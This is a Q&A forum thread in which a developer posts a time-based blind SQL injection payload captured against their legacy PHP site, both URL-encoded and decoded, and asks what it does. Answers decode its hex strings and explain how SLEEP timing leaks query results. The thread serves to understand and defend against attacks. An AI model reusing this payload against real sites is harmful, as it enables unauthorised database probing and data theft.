# What is that SQL injection supposed to do?

Tags: sql-injection

We recently had this sql injection attempt (rather successful tbh) on some of our beloved legacy code base.

> /someFile.php?b=4430%20AND%20%28SELECT%209391%20FROM%20%28SELECT%28SLEEP%2832-%28IF%28ORD%28MID%28%28SELECT%20HEX%28IFNULL%28CAST%28COUNT%28DISTINCT%28table_schema%29%29%20AS%20NCHAR%29%2C0x20%29%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20column_name%20LIKE%200x257761636874776f6f726425%20AND%20table_schema%20%21%3D%200x696e666f726d6174696f6e5f736368656d61%20AND%20table_schema%20%21%3D%200x6d7973716c%20AND%20table_schema%20%21%3D%200x706572666f726d616e63655f736368656d61%20AND%20table_schema%20%21%3D%200x737973%29%2C1%2C1%29%29%3E1%2C0%2C32%29%29%29%29%29iOms%29

all fixed, blocked and reported but I'm still curious -
What is that query supposed to to?
Just block resources (as in DOS) or gather information?

```sql
SELECT 9391
FROM (SELECT(SLEEP(32-(IF(ORD(MID(
                                    (SELECT HEX(IFNULL(CAST(COUNT(DISTINCT(table_schema)) AS NCHAR),0x20))
                                     FROM INFORMATION_SCHEMA.COLUMNS
                                     WHERE COLUMN_NAME LIKE 0x257761636874776f6f726425
                                       AND table_schema != 0x696e666f726d6174696f6e5f736368656d61
                                       AND table_schema != 0x6d7973716c
                                       AND table_schema != 0x706572666f726d616e63655f736368656d61
                                       AND table_schema != 0x737973),1, 1))>1, 0, 32)))))iOms
```

I don't get the HEX part of it...

Comment: Check this https://stackoverflow.com/questions/40809686/what-is-the-purpose-of-this-sort-of-sql-injection. I have googled one of those hex values.

Answer (score 5, accepted):

The 5 hexidecimal values encode these strings:

1. `%wachtwoord%`
2. `information_schema`
3. `mysql`
4. `performance_schema`
5. `sys`

It's trying to use query execution time as a side channel to communicate the results of the query. It will call `sleep` for different amounts of time depending on the result of that large subquery.

The result of the nested `select` statement is passed into `mid`, which then takes a 1-length substring starting at the 1st character. I.e., it's just fetching the character at index 1 (the second character).

This string is passed to `ord`, which converts its first character into a number. This number is then subtracted from `32`, and the query is made to sleep for that duration.

If you'll notice, each of the 5 strings above has a unique second character. This query is figuring out which one of them exist, and is waiting a unique amount of time in response. By timing how long the queries take, the attackers can see which of those tables exists, which they can use which specific RDMSS you're using. From there, they can use the RDMSS-specific SQL dialect for their next commands.

In other words: use prepared statements, folks. It's embarrassing that this is still an issue.

Comment:  wow - so it will encode actual information in the sleep time interval?

Comment: @mgherkins Yep. It's a really common side channel.